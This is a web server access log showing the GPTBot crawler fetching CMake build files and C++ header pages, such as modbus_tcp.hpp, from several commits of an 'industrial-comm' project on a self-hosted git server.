"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15180] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11052] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10249] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16837] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10240] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16832] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21649] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10822] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21650] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10224] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13907] [Gzip 7.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10226] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11296] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10687] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 